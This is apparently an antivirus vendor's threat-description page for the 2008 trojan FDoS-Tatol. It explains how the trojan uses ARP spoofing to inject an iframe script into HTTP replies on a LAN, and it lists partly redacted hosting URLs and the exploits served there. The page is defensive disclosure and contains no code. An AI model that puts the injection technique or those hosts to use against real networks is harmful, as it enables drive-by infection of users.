Content
FDoS-Tatol
- Type
- Trojan
- SubType
- Flooder
- Discovery Date
- 05/07/2008
- Length
- Minimum DAT
- 5290 (05/07/2008)
- Updated DAT
- 5291 (05/08/2008)
- Minimum Engine
- N/A
- Description Added
- 05/07/2008
- Description Modified
- 05/09/2008 2:17 AM (PT)
Tab Navigation
Characteristics
FDoS-Tatol will use ARP spoofing on the local LAN. It will sniff for HTTP replies and inject a JS script into the body of the HTML page. The script embeds an IFrame which points to a remote site hosting malicious scripts.
The following site was found to host these malicious scripts:
- http://user1.33-[removed].net
- http://user3.1a2b[removed].net
The following obfuscated exploits scripts had been detected at the point of investigation:
- JS/Exploit-LianZong - This is a vulnerabiliy in a popular Chinese game called LianZong. The vulnerability exists in the HanGamePluginCn18.dll in the game.
- VBS/Psyme (http://vil.nai.com/vil/content/v_100749.htm)
- Exploit-RealPlay.f (http://vil.nai.com/vil/content/v_143459.htm)
- JS/Exploit-Xunlei - This targets a vulnerability in Xunlei downloader tool in the pplayer.dll.
Other malware may be downloaded by these exploits.
Symptoms
- Presence of unexpected network connections to previously mentioned URLs.
Method of Infection
This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.
The tool can also propagate exploits by using ARP spoofing to inject scripts into HTML pages.
Removal
AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.
Variants
Variants
N/A
All Information
Overview -
FDoS-Tatol will use ARP spoofing on the local LAN. It will sniff for HTTP replies and inject a JS script into the body of the HTML page. The script embeds an IFrame which points to a remote site hosting malicious scripts.
Characteristics
Characteristics -
FDoS-Tatol will use ARP spoofing on the local LAN. It will sniff for HTTP replies and inject a JS script into the body of the HTML page. The script embeds an IFrame which points to a remote site hosting malicious scripts.
The following site was found to host these malicious scripts:
- http://user1.33-[removed].net
- http://user3.1a2b[removed].net
The following obfuscated exploits scripts had been detected at the point of investigation:
- JS/Exploit-LianZong - This is a vulnerabiliy in a popular Chinese game called LianZong. The vulnerability exists in the HanGamePluginCn18.dll in the game.
- VBS/Psyme (http://vil.nai.com/vil/content/v_100749.htm)
- Exploit-RealPlay.f (http://vil.nai.com/vil/content/v_143459.htm)
- JS/Exploit-Xunlei - This targets a vulnerability in Xunlei downloader tool in the pplayer.dll.
Other malware may be downloaded by these exploits.
Symptoms
Symptoms -
- Presence of unexpected network connections to previously mentioned URLs.
Method of Infection
Method of Infection -
This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.
The tool can also propagate exploits by using ARP spoofing to inject scripts into HTML pages.
Removal -
Removal -
AVERT recommends to always use latest DATs and engine. This threat will be cleaned if you have this combination.
Additional Windows ME/XP removal considerations
Variants
Variants -
N/A
